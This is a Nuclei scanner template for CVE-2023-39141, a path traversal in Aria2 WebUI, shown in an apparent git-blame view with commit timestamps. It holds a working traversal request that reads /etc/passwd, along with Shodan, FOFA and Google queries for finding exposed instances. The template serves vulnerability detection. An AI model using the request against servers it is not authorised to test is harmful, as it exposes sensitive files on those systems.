2023-08-23 07:00:27 +00:00
|
|
|
id: CVE-2023-39141
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Aria2 WebUI - Path traversal
|
|
|
|
author: DhiyaneshDk
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
|
2023-09-06 11:43:37 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to the latest version of Aria2 WebUI to fix the path traversal vulnerability.
|
2023-08-23 07:00:27 +00:00
|
|
|
reference:
|
|
|
|
- https://twitter.com/win3zz/status/1694239332465520684
|
|
|
|
- https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e
|
|
|
|
- https://github.com/ziahamza/webui-aria2/blob/109903f0e2774cf948698cd95a01f77f33d7dd2c/node-server.js#L10
|
2024-05-31 19:23:20 +00:00
|
|
|
- https://github.com/codeb0ss/CVE-2023-39141-PoC
|
|
|
|
- https://github.com/nomi-sec/PoC-in-GitHub
|
2023-08-31 11:46:18 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2023-39141
|
|
|
|
cwe-id: CWE-22
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.005
|
|
|
|
epss-percentile: 0.76302
|
2023-09-06 11:43:37 +00:00
|
|
|
cpe: cpe:2.3:a:ziahamza:webui-aria2:-:*:*:*:*:*:*:*
|
2023-08-23 07:00:27 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
2023-09-06 11:43:37 +00:00
|
|
|
max-request: 2
|
2023-08-31 11:46:18 +00:00
|
|
|
vendor: ziahamza
|
|
|
|
product: webui-aria2
|
2024-06-07 10:04:29 +00:00
|
|
|
shodan-query:
|
|
|
|
- title:"Aria2 WebUI"
|
|
|
|
- http.title:"aria2 webui"
|
2024-05-31 19:23:20 +00:00
|
|
|
fofa-query: title="aria2 webui"
|
|
|
|
google-query: intitle:"aria2 webui"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cve2023,cve,lfi,unauth,aria2,webui,ziahamza
|
2023-08-23 07:00:27 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2023-08-24 03:53:50 +00:00
|
|
|
- "{{BaseURL}}"
|
2023-08-23 07:00:27 +00:00
|
|
|
- "{{BaseURL}}/../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers:
|
2023-08-24 03:53:50 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'contains(body_1, "Aria2 WebUI")'
|
2023-08-24 06:07:23 +00:00
|
|
|
- 'regex("root:x:0:0:",body_2)'
|
2023-08-24 03:53:50 +00:00
|
|
|
condition: and
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 4a0a00473045022100a38d7e3d153b3ca9f265e415de91c44b4ad3fc85616857375dd7d2a497452520022065e6ee9c6a28f3f4532fb908c2729c6bebd94b235f44854b7ccd57a63c9bcbad:922c64590222798bb761d5b6d8e72950
|